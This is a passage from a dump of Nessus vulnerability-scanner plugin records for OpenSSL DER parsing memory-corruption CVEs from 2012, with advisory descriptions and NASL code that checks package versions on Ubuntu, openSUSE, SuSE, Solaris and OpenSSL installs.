11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8g-4ubuntu3.18\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8k-7ubuntu8.11\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8o-5ubuntu1.5\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libssl1.0.0\", pkgver:\"1.0.0e-2ubuntu4.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssl0.9.8 / libssl1.0.0\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:31:06", "description": "Specially crafted DER files could trigger a memory corruption in openssl", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : openssl (openSUSE-2012-308)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2333"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libopenssl-devel", "p-cpe:/a:novell:opensuse:libopenssl-devel-32bit", "p-cpe:/a:novell:opensuse:libopenssl1_0_0", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo", "p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:openssl", "p-cpe:/a:novell:opensuse:openssl-debuginfo", "p-cpe:/a:novell:opensuse:openssl-debugsource", "cpe:/o:novell:opensuse:12.1"], "id": "OPENSUSE-2012-308.NASL", "href": "https://www.tenable.com/plugins/nessus/74641", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-308.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74641);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2333\");\n\n script_name(english:\"openSUSE Security Update : openssl (openSUSE-2012-308)\");\n script_summary(english:\"Check for the openSUSE-2012-308 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted DER files could trigger a memory corruption in\nopenssl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=758060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=761838\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libopenssl1_0_0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libopenssl-devel-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libopenssl1_0_0-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"libopenssl1_0_0-debuginfo-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"openssl-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"openssl-debuginfo-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"openssl-debugsource-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libopenssl-devel-32bit-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-32bit-1.0.0e-34.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"libopenssl1_0_0-debuginfo-32bit-1.0.0e-34.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libopenssl-devel / libopenssl-devel-32bit / libopenssl1_0_0 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T16:16:53", "description": "According to its banner, the remote web server is running a version of OpenSSL earlier than 0.9.8w. As such, the OpenSSL library itself is reportedly affected by a memory corruption vulnerability via an integer truncation error in the function 'asn1_d2i_read_bio' when reading ASN.1 DER format data. \n\nApplications using the 'BIO' or 'FILE' based functions (i.e., 'd2i_*_bio' or 'd2i_*_fp' functions) are affected by this issue.\nAlso affected are 'S/MIME' or 'CMS' applications using 'SMIME_read_PKCS7' or 'SMIME_read_CMS' parsers. The OpenSSL command line utility is affected if used to handle untrusted DER formatted data.\n\nNote that the SSL/TLS code of OpenSSL is not affected. Also not affected are applications using memory-based ASN.1 functions (e.g., 'd2i_X509', 'd2i_PKCS12', etc.) nor are applications using only PEM functions.\n\nNote also that the original fix for CVE-2012-2110 in 0.9.8v was incomplete because the functions 'BUF_MEM_grow' and 'BUF_MEM_grow_clean', in file 'openssl/crypto/buffer/buffer.c', did not properly account for negative values of the argument 'len'.", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "nessus", "title": "OpenSSL < 0.9.8w ASN.1 asn1_d2i_read_bio Memory Corruption", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2023-08-22T00:00:00", "cpe": ["cpe:/a:openssl:openssl"], "id": "OPENSSL_0_9_8V.NASL", "href": "https://www.tenable.com/plugins/nessus/58799", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58799);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/08/22\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n script_bugtraq_id(53158, 53212);\n script_xref(name:\"EDB-ID\", value:\"18756\");\n\n script_name(english:\"OpenSSL < 0.9.8w ASN.1 asn1_d2i_read_bio Memory Corruption\");\n script_summary(english:\"Does a banner check.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host may be affected by a memory corruption vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the remote web server is running a version\nof OpenSSL earlier than 0.9.8w. As such, the OpenSSL library itself\nis reportedly affected by a memory corruption vulnerability via an\ninteger truncation error in the function 'asn1_d2i_read_bio' when\nreading ASN.1 DER format data. \n\nApplications using the 'BIO' or 'FILE' based functions (i.e., \n'd2i_*_bio' or 'd2i_*_fp' functions) are affected by this issue.\nAlso affected are 'S/MIME' or 'CMS' applications using\n'SMIME_read_PKCS7' or 'SMIME_read_CMS' parsers. The OpenSSL command\nline utility is affected if used to handle untrusted DER formatted\ndata.\n\nNote that the SSL/TLS code of OpenSSL is not affected. Also not\naffected are applications using memory-based ASN.1 functions (e.g.,\n'd2i_X509', 'd2i_PKCS12', etc.) nor are applications using only PEM\nfunctions.\n\nNote also that the original fix for CVE-2012-2110 in 0.9.8v was\nincomplete because the functions 'BUF_MEM_grow' and\n'BUF_MEM_grow_clean', in file 'openssl/crypto/buffer/buffer.c', did\nnot properly account for negative values of the argument 'len'.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20120419.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2012/Apr/210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20120424.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://cvs.openssl.org/chngview?cn=22479\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/changelog.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to OpenSSL 0.9.8w or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-2110\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"openssl_version.nasl\", \"openssl_nix_installed.nbin\", \"openssl_win_installed.nbin\");\n script_require_keys(\"installed_sw/OpenSSL\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras_openssl.inc');\n\nvar app_info = vcf::combined_get_app_info(app:'OpenSSL');\n\nvcf::check_all_backporting(app_info:app_info);\n\nvar constraints = [{ 'min_version' : '0.0.0', 'fixed_version' : '0.9.8w'}];\n\nvcf::openssl::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:40:55", "description": "This update of openssl fixes an integer conversation issue which could cause a heap-based memory corruption. (CVE-2012-2110)\n\nAdditionally, a check for negative buffer length values was added (CVE-2012-2131) and a memory leak when creating public keys fixed.", "cvss3": {}, "published": "2012-05-23T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : openssl (ZYPP Patch Number 8112)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_OPENSSL-8112.NASL", "href": "https://www.tenable.com/plugins/nessus/59237", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59237);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n\n script_name(english:\"SuSE 10 Security Update : openssl (ZYPP Patch Number 8112)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of openssl fixes an integer conversation issue which could\ncause a heap-based memory corruption. (CVE-2012-2110)\n\nAdditionally, a check for negative buffer length values was added\n(CVE-2012-2131) and a memory leak when creating public keys fixed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2110.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2131.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8112.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"openssl-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"openssl-devel-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"openssl-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"openssl-devel-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"openssl-doc-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"openssl-32bit-0.9.8a-18.68.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"openssl-devel-32bit-0.9.8a-18.68.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:19:00", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. (CVE-2012-2110)\n\n - Multiple integer signedness errors in crypto/buffer/buffer.c in OpenSSL 0.9.8v allow remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-2110. (CVE-2012-2131)", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : openssl (multiple_vulnerabilities_in_openssl1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2110", "CVE-2012-2131"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:openssl"], "id": "SOLARIS11_OPENSSL_20120626.NASL", "href": "https://www.tenable.com/plugins/nessus/80717", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80717);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : openssl (multiple_vulnerabilities_in_openssl1)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c\n in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1\n before 1.0.1a does not properly interpret integer data,\n which allows remote attackers to conduct buffer overflow\n attacks, and cause a denial of service (memory\n corruption) or possibly have unspecified other impact,\n via crafted DER data, as demonstrated by an X.509\n certificate or an RSA public key. (CVE-2012-2110)\n\n - Multiple integer signedness errors in\n crypto/buffer/buffer.c in OpenSSL 0.9.8v allow remote\n attackers to conduct buffer overflow attacks, and cause\n a denial of service (memory corruption) or possibly have\n unspecified other impact, via crafted DER data, as\n demonstrated by an X.509 certificate or an RSA public\n key. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2012-2110. (CVE-2012-2131)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/multiple-vulnerabilities-in-openssl\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ecff53d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 8.5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:openssl\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^openssl$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.8.0.5.0\", sru:\"SRU 8.5\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : openssl\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"openssl\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:38:59", "description": "It was discovered that OpenSSL could be made to dereference a NULL pointer when processing S/MIME messages. A remote attacker could use this to cause a denial of service. These issues did not affect Ubuntu 8.04 LTS. (CVE-2006-7250, CVE-2012-1165)\n\nTavis Ormandy discovered that OpenSSL did not properly perform bounds checking when processing DER data via BIO or FILE functions. A remote attacker could trigger this flaw in services that used SSL to cause a denial of service or possibly execute arbitrary code with application privileges. (CVE-2012-2110).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-04-20T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : openssl vulnerabilities (USN-1424-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-7250", "CVE-2012-1165", "CVE-2012-2110"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8", "p-cpe:/a:canonical:ubuntu_linux:libssl1.0.0", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1424-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58808", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1424-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58808);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2006-7250\", \"CVE-2012-1165\", \"CVE-2012-2110\");\n script_bugtraq_id(52181, 52764, 53158);\n script_xref(name:\"USN\", value:\"1424-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : openssl vulnerabilities (USN-1424-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that OpenSSL could be made to dereference a NULL\npointer when processing S/MIME messages. A remote attacker could use\nthis to cause a denial of service. These issues did not affect Ubuntu\n8.04 LTS. (CVE-2006-7250, CVE-2012-1165)\n\nTavis Ormandy discovered that OpenSSL did not properly perform bounds\nchecking when processing DER data via BIO or FILE functions. A remote\nattacker could trigger this flaw in services that used SSL to cause a\ndenial of service or possibly execute arbitrary code with application\nprivileges. (CVE-2012-2110).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1424-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libssl0.9.8 and / or libssl1.0.0 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl0.9.8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libssl1.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/02/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", 